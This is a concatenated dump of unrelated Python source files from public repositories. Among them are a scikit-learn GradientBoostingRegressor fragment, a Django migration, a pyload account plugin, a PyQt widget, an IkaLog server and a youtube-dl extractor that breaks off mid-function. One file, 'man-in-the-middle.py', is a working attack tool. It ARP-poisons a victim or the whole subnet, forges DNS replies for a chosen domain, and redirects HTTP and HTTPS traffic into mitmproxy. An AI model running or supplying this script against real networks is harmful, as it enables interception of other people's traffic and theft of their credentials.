raise AttributeError('loss=%r does not support predict_proba' %
self.loss)
class GradientBoostingRegressor(BaseGradientBoosting, RegressorMixin):
"""Gradient Boosting for regression.
GB builds an additive model in a forward stage-wise fashion;
it allows for the optimization of arbitrary differentiable loss functions.
In each stage a regression tree is fit on the negative gradient of the
given loss function.
Parameters
----------
loss : {'ls', 'lad', 'huber', 'quantile'}, optional (default='ls')
loss function to be optimized. 'ls' refers to least squares
regression. 'lad' (least absolute deviation) is a highly robust
loss function solely based on order information of the input
variables. 'huber' is a combination of the two. 'quantile'
allows quantile regression (use `alpha` to specify the quantile).
learning_rate : float, optional (default=0.1)
learning rate shrinks the contribution of each tree by `learning_rate`.
There is a trade-off between learning_rate and n_estimators.
n_estimators : int (default=100)
The number of boosting stages to perform. Gradient boosting
is fairly robust to over-fitting so a large number usually
results in better performance.
max_depth : integer, optional (default=3)
maximum depth of the individual regression estimators. The maximum
depth limits the number of nodes in the tree. Tune this parameter
for best performance; the best value depends on the interaction
of the input variables.
Ignored if ``max_leaf_nodes`` is not None.
min_samples_split : integer, optional (default=2)
The minimum number of samples required to split an internal node.
min_samples_leaf : integer, optional (default=1)
The minimum number of samples required to be at a leaf node.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the input samples required to be at a
leaf node.
subsample : float, optional (default=1.0)
The fraction of samples to be used for fitting the individual base
learners. If smaller than 1.0 this results in Stochastic Gradient
Boosting. `subsample` interacts with the parameter `n_estimators`.
Choosing `subsample < 1.0` leads to a reduction of variance
and an increase in bias.
max_features : int, float, string or None, optional (default=None)
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=n_features`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Choosing `max_features < n_features` leads to a reduction of variance
and an increase in bias.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_leaf_nodes : int or None, optional (default=None)
Grow trees with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
alpha : float (default=0.9)
The alpha-quantile of the huber loss function and the quantile
loss function. Only if ``loss='huber'`` or ``loss='quantile'``.
init : BaseEstimator, None, optional (default=None)
An estimator object that is used to compute the initial
predictions. ``init`` has to provide ``fit`` and ``predict``.
If None it uses ``loss.init_estimator``.
verbose : int, default: 0
Enable verbose output. If 1 then it prints progress and performance
once in a while (the more trees the lower the frequency). If greater
than 1 then it prints progress and performance for every tree.
warm_start : bool, default: False
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just erase the
previous solution.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Attributes
----------
feature_importances_ : array, shape = [n_features]
The feature importances (the higher, the more important the feature).
oob_improvement_ : array, shape = [n_estimators]
The improvement in loss (= deviance) on the out-of-bag samples
relative to the previous iteration.
``oob_improvement_[0]`` is the improvement in
loss of the first stage over the ``init`` estimator.
train_score_ : array, shape = [n_estimators]
The i-th score ``train_score_[i]`` is the deviance (= loss) of the
model at iteration ``i`` on the in-bag sample.
If ``subsample == 1`` this is the deviance on the training data.
loss_ : LossFunction
The concrete ``LossFunction`` object.
`init` : BaseEstimator
The estimator that provides the initial predictions.
Set via the ``init`` argument or ``loss.init_estimator``.
estimators_ : ndarray of DecisionTreeRegressor, shape = [n_estimators, 1]
The collection of fitted sub-estimators.
See also
--------
DecisionTreeRegressor, RandomForestRegressor
References
----------
J. Friedman, Greedy Function Approximation: A Gradient Boosting
Machine, The Annals of Statistics, Vol. 29, No. 5, 2001.
J. Friedman, Stochastic Gradient Boosting, 1999
T. Hastie, R. Tibshirani and J. Friedman.
Elements of Statistical Learning Ed. 2, Springer, 2009.
"""
_SUPPORTED_LOSS = ('ls', 'lad', 'huber', 'quantile')
def __init__(self, loss='ls', learning_rate=0.1, n_estimators=100,
subsample=1.0, min_samples_split=2,
min_samples_leaf=1, min_weight_fraction_leaf=0.,
max_depth=3, init=None, random_state=None,
max_features=None, alpha=0.9, verbose=0, max_leaf_nodes=None,
warm_start=False):
super(GradientBoostingRegressor, self).__init__(
loss=loss, learning_rate=learning_rate, n_estimators=n_estimators,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_depth=max_depth, init=init, subsample=subsample,
max_features=max_features,
random_state=random_state, alpha=alpha, verbose=verbose,
max_leaf_nodes=max_leaf_nodes, warm_start=warm_start)
def predict(self, X):
"""Predict regression target for X.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
y : array of shape = [n_samples]
The predicted values.
"""
X = check_array(X, dtype=DTYPE, order="C")
return self._decision_function(X).ravel()
def staged_predict(self, X):
"""Predict regression target at each stage for X.
This method allows monitoring (i.e. determine error on testing set)
after each stage.
Parameters
----------
X : array-like of shape = [n_samples, n_features]
The input samples.
Returns
-------
y : generator of array of shape = [n_samples]
The predicted value of the input samples.
"""
for y in self._staged_decision_function(X):
yield y.ravel()
|
idea4bsd/idea4bsd | refs/heads/idea4bsd-master | python/testData/copyPaste/multiLine/IndentInnerFunction2.dst.py | 83 | def foo(self):
x = 1
y = 2
<caret>
z = 3 |
mehdilauters/man-in-the-middle | refs/heads/master | man-in-the-middle.py | 1 | #!/usr/bin/env python
#
# Execute with sudo python arppoison.py
#
#
import time
import argparse
import signal
import nfqueue
import threading
from multiprocessing import Process
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
exit = False
threads = []
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-v", "--victimIP", help="Choose the victim IP address. Example: -v 192.168.0.5")
parser.add_argument("-g", "--gateway", help="Choose the router IP address. Example: -r 192.168.0.1")
parser.add_argument("-i", "--interface", help="Choose the network interface. Example: -i eth0")
parser.add_argument("-d", "--dns", help="dns spoofing. Example: -d hackaday.com")
parser.add_argument("-w", "--web", action='store_true', help="80 web proxy")
parser.add_argument("-s", "--ssl", action='store_true', help="443 web proxy")
parser.add_argument("-p", "--proxy", action='store_true', help="start proxy")
parser.add_argument("-c", "--clean", action='store_true', help="clean all stuff")
return parser.parse_args()
def get_gw(interface):
for nw, nm, gw, iface, addr in read_routes():
if iface == interface and gw != "0.0.0.0":
return gw
def spoof(localMac,victims,gateway):
arps = []
op = 2
for victim in victims:
#spoof victim
arp = ARP(op=op,psrc=victim,pdst=gateway,hwdst=localMac)
arps.append(arp)
#spoof gw
arp = ARP(op=op,psrc=gateway,pdst=victim,hwdst=localMac)
arps.append(arp)
def run():
j = 0
while not exit:
for arp in arps:
j+=1
if exit:
break
send(arp,verbose=False)
time.sleep(1)
t1 = threading.Thread(target=run)
threads.append(t1)
#t1.join()
queues = []
def clean():
with open('/proc/sys/net/ipv4/ip_forward', 'w') as ipf:
ipf.write('0\n')
print "[x] clean iptable"
os.system('iptables -t nat -F')
os.system('iptables -t nat -X')
os.system('iptables -F')
os.system('iptables -X')
def signal_handler(signal, frame):
exit = True
clean()
for queue in queues:
queue.unbind(socket.AF_INET)
queue.close()
sys.exit("losing...")
def dns_setup(dns, localIp):
def dns_callback(i, payload):
data = payload.get_data()
pkt = IP(data)
if not pkt.haslayer(DNSQR):
payload.set_verdict(nfqueue.NF_ACCEPT)
else:
if dns[0] in pkt[DNS].qd.qname:
print "%s %s => %s"%(hex(pkt[DNS].id), pkt[IP].src, pkt[IP].dst)
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=localIp))
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt))
print '[+] Sent spoofed packet for %s' % dns
os.system('iptables -A FORWARD -p udp --dport 53 -j NFQUEUE --queue-num 100')
queue = nfqueue.queue()
queue.open()
queue.bind(socket.AF_INET)
queue.set_callback(dns_callback)
queue.create_queue(100)
def run():
queue.try_run()
print "Dns spoof stopped"
p = Process(target=run)
threads.append(p)
def main(args):
if os.geteuid() != 0:
sys.exit("[!] Please run as root")
clean()
if args.clean:
return
interface = "eth0"
if args.interface is not None:
interface = args.interface
localMac = get_if_hwaddr(interface)
localIp = get_if_addr(interface)
if args.gateway is not None:
gateway = args.gateway
else:
gateway = get_gw(interface)
victims = []
if args.victimIP is None:
for i in range(0,255):
base = localIp.split(".")[:3]
base.append(str(i))
ip = '.'.join(base)
victims.append(ip)
else:
victims.append(args.victimIP)
if gateway is None:
print "Gateway issue"
return
signal.signal(signal.SIGUSR1, signal_handler)
with open('/proc/sys/net/ipv4/ip_forward', 'w') as ipf:
ipf.write('1\n')
if args.dns is not None:
dns_setup(args.dns, localIp)
need_proxy = False
if args.web:
need_proxy = True
os.system('iptables -t nat -A PREROUTING -i %s -p tcp --dport 80 -j REDIRECT --to-port 8080'%interface)
if args.ssl:
need_proxy = True
os.system('iptables -t nat -A PREROUTING -i %s -p tcp --dport 443 -j REDIRECT --to-port 8080'%interface)
if args.proxy:
if need_proxy:
def run():
os.system("mitmproxy -T --host --anticache --stream 10m")
print "proxy stopped"
p = Process(target=run)
threads.append(p)
else:
print "Proxy started but not needed"
else:
if need_proxy:
print "you will need to start your proxy manually"
spoof(localMac, victims, gateway)
try:
for t in threads:
t.start()
for t in threads:
t.join()
except KeyboardInterrupt:
print "stop"
clean()
main(parse_args()) |
haystack/eyebrowse-server | refs/heads/master | notifications/migrations/0003_auto__del_field_notification_user__add_field_notification_recipient__a.py | 1 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Notification.user'
db.delete_column('notifications_notification', 'user_id')
# Adding field 'Notification.recipient'
db.add_column('notifications_notification', 'recipient',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, related_name=u'notification_recipient', to=orm['auth.User']),
keep_default=False)
# Adding field 'Notification.sender'
db.add_column('notifications_notification', 'sender',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, related_name=u'notification_sender', to=orm['auth.User']),
keep_default=False)
# Adding field 'Notification.date_created'
db.add_column('notifications_notification', 'date_created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime(2015, 3, 22, 0, 0)),
keep_default=False)
# Adding field 'Notification.url'
db.add_column('notifications_notification', 'url',
self.gf('django.db.models.fields.URLField')(max_length=300, null=True),
keep_default=False)
def backwards(self, orm):
# Adding field 'Notification.user'
db.add_column('notifications_notification', 'user',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['auth.User']),
keep_default=False)
# Deleting field 'Notification.recipient'
db.delete_column('notifications_notification', 'recipient_id')
# Deleting field 'Notification.sender'
db.delete_column('notifications_notification', 'sender_id')
# Deleting field 'Notification.date_created'
db.delete_column('notifications_notification', 'date_created')
# Deleting field 'Notification.url'
db.delete_column('notifications_notification', 'url')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'notifications.noticequeuebatch': {
'Meta': {'object_name': 'NoticeQueueBatch'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pickled_data': ('django.db.models.fields.TextField', [], {})
},
'notifications.noticesetting': {
'Meta': {'unique_together': "((u'user', u'notice_type', u'medium', u'scoping_content_type', u'scoping_object_id'),)", 'object_name': 'NoticeSetting'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'medium': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'notice_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['notifications.NoticeType']"}),
'scoping_content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
'scoping_object_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'send': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'notifications.noticetype': {
'Meta': {'object_name': 'NoticeType'},
'default': ('django.db.models.fields.IntegerField', [], {}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'display': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'})
},
'notifications.notification': {
'Meta': {'object_name': 'Notification'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2015, 3, 22, 0, 0)'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notice_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['notifications.NoticeType']"}),
'recipient': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'notification_recipient'", 'to': "orm['auth.User']"}),
'seen': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'sender': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'notification_sender'", 'to': "orm['auth.User']"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '300', 'null': 'True'})
}
}
complete_apps = ['notifications'] |
TheBraveWarrior/pyload | refs/heads/stable | module/plugins/accounts/UptoboxCom.py | 5 | # -*- coding: utf-8 -*-
import time
import re
import urlparse
from ..internal.misc import json
from ..internal.XFSAccount import XFSAccount
class UptoboxCom(XFSAccount):
__name__ = "UptoboxCom"
__type__ = "account"
__version__ = "0.23"
__status__ = "testing"
__description__ = """Uptobox.com account plugin"""
__license__ = "GPLv3"
__authors__ = [("benbox69", "[email protected]"),
("GammaC0de", "nitzo2001[AT]yahoo[DOT]com")]
PLUGIN_DOMAIN = "uptobox.com"
PLUGIN_URL = "https://uptobox.com/"
PREMIUM_PATTERN = r'Premium member'
VALID_UNTIL_PATTERN = r"class='expiration-date .+?'>(\d{1,2} [\w^_]+ \d{4})"
def signin(self, user, password, data):
html = self.load(self.LOGIN_URL, cookies=self.COOKIES)
if re.search(self.LOGIN_SKIP_PATTERN, html):
self.skip_login()
html = self.load(self.PLUGIN_URL,
get={'op': "login",
'referer': "homepage"},
post={'login': user,
'password': password},
cookies=self.COOKIES)
if re.search(self.LOGIN_SKIP_PATTERN, html) is None:
self.fail_login()
|
christianurich/VIBe2UrbanSim | refs/heads/master | 3rdparty/opus/src/opus_gui/models_manager/controllers/submodel_structure_editor_tree.py | 2 | # Opus/UrbanSim urban simulation software.
# Copyright (C) 2005-2009 University of Washington
# See opus_core/LICENSE
from PyQt4 import QtGui, QtCore
from lxml import etree
from opus_gui.util.convenience import get_unique_name
from opus_gui.models_manager.models.submodel_structure_item import SubmodelStructureItem
class SubmodelStructureEditorTree(QtGui.QTreeWidget):
'''
Custom Tree Widget that has some convenience methods and supports drag and drop assignments of
equations to nests.
'''
def __init__(self, parent_widget = None):
QtGui.QTreeWidget.__init__(self, parent_widget)
self._root_node = None
self.setAcceptDrops(True)
def set_root_node(self, root_node):
self._root_node = root_node
def create_structure_node(self, structure_type):
''' create and insert a new tag of structure_type (<nest> or <equation>).
Accepted values for structure_type are "nest" and "equation" '''
if structure_type not in ['nest', 'equation']:
raise ValueError("Don't know how to create a structure node for '%s'" %structure_type)
# get a unique name for the structure node
taken_names = [node.get('name') for node in self._root_node.findall(structure_type)]
name = get_unique_name('new %s' % structure_type, taken_names)
# create the node with a <variable_list> child node
attrib = {'name': name, '%s_id' % structure_type: '-2'}
structure_node = etree.SubElement(self._root_node, structure_type, attrib)
item = SubmodelStructureItem(structure_node, editable=True, parent_widget=self)
if structure_type == 'equation':
etree.SubElement(structure_node, 'variable_list', {'type': 'variable_list'})
# and insert the item
self.addTopLevelItem(item)
self.emit(QtCore.SIGNAL('structure_changed'))
def delete_struct_item(self, item):
''' deletes the given item from the tree and the XML '''
node = item._node
if item.parent():
index = item.parent().indexOfChild(item)
item.parent().takeChild(index)
else:
index = self.indexOfTopLevelItem(item)
self.takeTopLevelItem(index)
node.getparent().remove(node)
self.emit(QtCore.SIGNAL('structure_changed'))
def mousePressEvent(self, event):
QtGui.QTreeWidget.mousePressEvent(self, event)
# start drags when the left mouse button is pressed
if event.buttons() == QtCore.Qt.LeftButton:
mime = QtCore.QMimeData() # the data object to be passed with the event
# monkey patch the mime object to avoid converting the Python object to QBytes...
item = self.itemAt(event.pos())
if item is None:
return
mime.dragged_item = item
drag = QtGui.QDrag(self)
drag.setMimeData(mime)
# prompt the submode editor to rebuild the structure when the drop was made
if drag.start(QtCore.Qt.MoveAction) == QtCore.Qt.MoveAction:
# item._node.getparent().remove(item._node)
self.emit(QtCore.SIGNAL('structure_changed'))
def _target_and_source_from_event(self, event):
''' convenience to get the target and source item from an event '''
target_item = self.itemAt(event.pos())
source_item = event.mimeData().dragged_item
return (target_item, source_item)
def dragEnterEvent(self, event):
# event must be accepted by enter and move in order to be dropped
event.accept()
def dragMoveEvent(self, event):
target_item, source_item = self._target_and_source_from_event(event)
# if source_item is None we are not dragging anything droppable -- so reject it
# if target_item is None, we are dropping something in the "white area" of the widget
# and if target_item is not None we are dropping on another item
if source_item is None:
event.ignore()
elif target_item is None or target_item._node.tag == 'nest':
event.accept()
else:
event.ignore()
def dropEvent(self, event):
target_item, source_item = self._target_and_source_from_event(event)
if target_item is source_item:
event.ignore()
return
# if the item is dropped in the "white area" of the widget the target_item will be None
if target_item is None:
target_node = self._root_node
else:
target_node = target_item._node
target_node.append(source_item._node)
event.setDropAction(QtCore.Qt.MoveAction)
event.accept()
|
deathmetalland/IkaLog | refs/heads/youtube_sample | ikalog/outputs/mikumikumouth.py | 3 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# IkaLog
# ======
# Copyright (C) 2015 ExceptionError
# Copyright (C) 2015 Takeshi HASEGAWA
# Copyright (C) 2015 AIZAWA Hina
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import random
import select
import socket
import sys
import traceback
import threading
from ikalog.constants import *
from ikalog.utils import *
from .commentator import Commentator
class MikuMikuMouthServer(object):
''' みくみくまうすにコマンドを送信するサーバーです
http://mikumikumouth.net/
'''
def __init__(self, host='127.0.0.1', port=50082):
self.host = host
self.port = port
self._socks = set([])
def listen(self):
self._listen_thread = threading.Thread(target=self._listen)
self._listen_thread.start()
def _listen(self):
self._server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socks.add(self._server)
try:
self._server.bind((self.host, self.port))
self._server.listen(5)
self._loop = True
while self._loop:
rready, wready, xready = select.select(self._socks, [], [], 1)
for sock in rready:
if sock is self._server:
conn, address = self._server.accept()
self._socks.add(conn)
finally:
for sock in self._socks:
sock.close()
self._socks.clear()
def close(self):
self._loop = False
def _send(self, text):
for sock in self._socks:
if sock is not self._server:
try:
sock.sendall(text.encode('utf-8'))
except ConnectionAbortedError:
pass
def talk(self, data):
print(json.dumps(data))
self._send(json.dumps(data))
class MikuMikuMouth(Commentator):
'''
みくみくまうすサーバー
'''
def __init__(self,
host='127.0.0.1',
port=50082,
dictionary={},
dictionary_csv=None,
custom_read_csv=None):
super(MikuMikuMouth, self).__init__(dictionary, dictionary_csv, custom_read_csv)
self._server = MikuMikuMouthServer(host, port)
self._server.listen()
self._read_event('initialize');
def config_key(self):
return 'mikumikumouth'
def set_config(self, config):
dictionary = config.get(self.config_key(), {})
self._dict = BoyomiDictionary(dictionary)
def get_config(self, config):
mikumikumouth = self._dict.get_config()
config[self.config_key()] = mikumikumouth
return config
def _do_read(self, message):
if (self._server is None) or (not self._enabled):
return
message["tag"] = "white"
self._server.talk(message)
def on_stop(self, context):
self._server.close()
|
renzon/livrogae | refs/heads/master | backend/test/curso_tests/negocio.py | 1 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from curso.model import Curso
from curso.negocio import PesquisarCursoCmd
from util import GAETestCase
class PesquisarCursoTest(GAETestCase):
def test_execute(self):
curso=Curso(nome='PyPrático')
curso.put()
curso_id_str=str(curso.key.id())
comando=PesquisarCursoCmd(curso_id_str)
comando.execute()
curso_encontrado=comando.result
self.assertEqual(curso.key, curso_encontrado.key)
|
Just-D/chromium-1 | refs/heads/master | tools/telemetry/third_party/gsutilz/third_party/boto/boto/ec2/autoscale/request.py | 152 | # Copyright (c) 2009 Reza Lotun http://reza.lotun.name/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
class Request(object):
def __init__(self, connection=None):
self.connection = connection
self.request_id = ''
def __repr__(self):
return 'Request:%s' % self.request_id
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == 'RequestId':
self.request_id = value
else:
setattr(self, name, value)
|
noba3/KoTos | refs/heads/master | addons/script.module.youtube.dl/lib/youtube_dl/extractor/channel9.py | 27 | from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
ExtractorError,
parse_filesize,
qualities,
)
class Channel9IE(InfoExtractor):
'''
Common extractor for channel9.msdn.com.
The type of provided URL (video or playlist) is determined according to
meta Search.PageType from web page HTML rather than URL itself, as it is
not always possible to do.
'''
IE_DESC = 'Channel 9'
IE_NAME = 'channel9'
_VALID_URL = r'https?://(?:www\.)?channel9\.msdn\.com/(?P<contentpath>.+)/?'
_TESTS = [
{
'url': 'http://channel9.msdn.com/Events/TechEd/Australia/2013/KOS002',
'md5': 'bbd75296ba47916b754e73c3a4bbdf10',
'info_dict': {
'id': 'Events/TechEd/Australia/2013/KOS002',
'ext': 'mp4',
'title': 'Developer Kick-Off Session: Stuff We Love',
'description': 'md5:c08d72240b7c87fcecafe2692f80e35f',
'duration': 4576,
'thumbnail': 're:http://.*\.jpg',
'session_code': 'KOS002',
'session_day': 'Day 1',
'session_room': 'Arena 1A',
'session_speakers': ['Ed Blankenship', 'Andrew Coates', 'Brady Gaster', 'Patrick Klug', 'Mads Kristensen'],
},
},
{
'url': 'http://channel9.msdn.com/posts/Self-service-BI-with-Power-BI-nuclear-testing',
'md5': 'b43ee4529d111bc37ba7ee4f34813e68',
'info_dict': {
'id': 'posts/Self-service-BI-with-Power-BI-nuclear-testing',
'ext': 'mp4',
'title': 'Self-service BI with Power BI - nuclear testing',
'description': 'md5:d1e6ecaafa7fb52a2cacdf9599829f5b',
'duration': 1540,
'thumbnail': 're:http://.*\.jpg',
'authors': ['Mike Wilmot'],
},
},
{
# low quality mp4 is best
'url': 'https://channel9.msdn.com/Events/CPP/CppCon-2015/Ranges-for-the-Standard-Library',
'info_dict': {
'id': 'Events/CPP/CppCon-2015/Ranges-for-the-Standard-Library',
'ext': 'mp4',
'title': 'Ranges for the Standard Library',
'description': 'md5:2e6b4917677af3728c5f6d63784c4c5d',
'duration': 5646,
'thumbnail': 're:http://.*\.jpg',
},
'params': {
'skip_download': True,
},
}
]
_RSS_URL = 'http://channel9.msdn.com/%s/RSS'
def _formats_from_html(self, html):
FORMAT_REGEX = r'''
(?x)
<a\s+href="(?P<url>[^"]+)">(?P<quality>[^<]+)</a>\s*
<span\s+class="usage">\((?P<note>[^\)]+)\)</span>\s*
(?:<div\s+class="popup\s+rounded">\s*
<h3>File\s+size</h3>\s*(?P<filesize>.*?)\s*
</div>)? # File size part may be missing
'''
quality = qualities((
'MP3', 'MP4',
'Low Quality WMV', 'Low Quality MP4',
'Mid Quality WMV', 'Mid Quality MP4',
'High Quality WMV', 'High Quality MP4'))
formats = [{
'url': x.group('url'),
'format_id': x.group('quality'),
'format_note': x.group('note'),
'format': '%s (%s)' % (x.group('quality'), x.group('note')),
'filesize_approx': parse_filesize(x.group('filesize')),
'quality': quality(x.group('quality')),
'vcodec': 'none' if x.group('note') == 'Audio only' else None,
} for x in list(re.finditer(FORMAT_REGEX, html))]
self._sort_formats(formats)
return formats
def _extract_title(self, html):
title = self._html_search_meta('title', html, 'title')
if title is None:
title = self._og_search_title(html)
TITLE_SUFFIX = ' (Channel 9)'
if title is not None and title.endswith(TITLE_SUFFIX):
title = title[:-len(TITLE_SUFFIX)]
return title
def _extract_description(self, html):
DESCRIPTION_REGEX = r'''(?sx)
<div\s+class="entry-content">\s*
<div\s+id="entry-body">\s*
(?P<description>.+?)\s*
</div>\s*
</div>
'''
m = re.search(DESCRIPTION_REGEX, html)
if m is not None:
return m.group('description')
return self._html_search_meta('description', html, 'description')
def _extract_duration(self, html):
m = re.search(r'"length": *"(?P<hours>\d{2}):(?P<minutes>\d{2}):(?P<seconds>\d{2})"', html)
return ((int(m.group('hours')) * 60 * 60) + (int(m.group('minutes')) * 60) + int(m.group('seconds'))) if m else None
def _extract_slides(self, html):
m = re.search(r'<a href="(?P<slidesurl>[^"]+)" class="slides">Slides</a>', html)
return m.group('slidesurl') if m is not None else None
def _extract_zip(self, html):
m = re.search(r'<a href="(?P<zipurl>[^"]+)" class="zip">Zip</a>', html)
return m.group('zipurl') if m is not None else None
def _extract_avg_rating(self, html):
m = re.search(r'<p class="avg-rating">Avg Rating: <span>(?P<avgrating>[^<]+)</span></p>', html)
return float(m.group('avgrating')) if m is not None else 0
def _extract_rating_count(self, html):
m = re.search(r'<div class="rating-count">\((?P<ratingcount>[^<]+)\)</div>', html)
return int(self._fix_count(m.group('ratingcount'))) if m is not None else 0
def _extract_view_count(self, html):
m = re.search(r'<li class="views">\s*<span class="count">(?P<viewcount>[^<]+)</span> Views\s*</li>', html)
return int(self._fix_count(m.group('viewcount'))) if m is not None else 0
def _extract_comment_count(self, html):
m = re.search(r'<li class="comments">\s*<a href="#comments">\s*<span class="count">(?P<commentcount>[^<]+)</span> Comments\s*</a>\s*</li>', html)
return int(self._fix_count(m.group('commentcount'))) if m is not None else 0
def _fix_count(self, count):
return int(str(count).replace(',', '')) if count is not None else None
def _extract_authors(self, html):
m = re.search(r'(?s)<li class="author">(.*?)</li>', html)
if m is None:
